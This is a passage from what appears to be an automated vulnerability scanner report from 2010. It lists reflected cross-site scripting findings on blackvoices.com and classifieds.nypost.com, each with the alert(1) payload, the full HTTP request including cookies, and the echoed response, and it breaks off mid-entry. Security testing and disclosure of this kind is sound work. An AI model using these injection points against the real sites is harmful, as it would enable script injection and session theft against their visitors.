Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*5521b</script><script>alert(1)</script>b0ec37dd172/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.149. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ee9d</script><script>alert(1)</script>4509e38f224 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com2ee9d</script><script>alert(1)</script>4509e38f224/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.3039161932.1081017600; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com2ee9d</script><script>alert(1)</script>4509e38f224/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

1.150. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afe6</script><script>alert(1)</script>825b8783c8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.371650124.1820198144; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31018
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.151. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ddde"><script>alert(1)</script>26b4242f446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4ddde"><script>alert(1)</script>26b4242f446=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/?4ddde"><script>alert(1)</script>26b4242f446=1" />
...[SNIP]...

1.152. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c0d"-alert(1)-"e4e8feb3184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing14c0d"-alert(1)-"e4e8feb3184/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing14c0d"-alert(1)-"e4e8feb3184/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.153. http://www.classifieds.nypost.com/housing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86939"><script>alert(1)</script>68721ea7f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing86939"><script>alert(1)</script>68721ea7f0d/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing86939"><script>alert(1)</script>68721ea7f0d/" />
...[SNIP]...

1.154. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410a9"><script>alert(1)</script>94bde877b6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/?410a9"><script>alert(1)</script>94bde877b6a=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/?410a9"><script>alert(1)</script>94bde877b6a=1" />
...[SNIP]...

1.155. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b44"-alert(1)-"21f0db2ce7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/?d7b44"-alert(1)-"21f0db2ce7f=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/?d7b44"-alert(1)-"21f0db2ce7f=1","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.156. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6dc5"-alert(1)-"47fd84fae45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb6dc5"-alert(1)-"47fd84fae45/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb6dc5"-alert(1)-"47fd84fae45/rent/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.157. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb0"><script>alert(1)</script>3f30dc1b8ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housinge1cb0"><script>alert(1)</script>3f30dc1b8ef/rent/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housinge1cb0"><script>alert(1)</script>3f30dc1b8ef/rent/" />
...[SNIP]...

1.158. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f549c"-alert(1)-"e2c14dc3ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rentf549c"-alert(1)-"e2c14dc3ef7/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
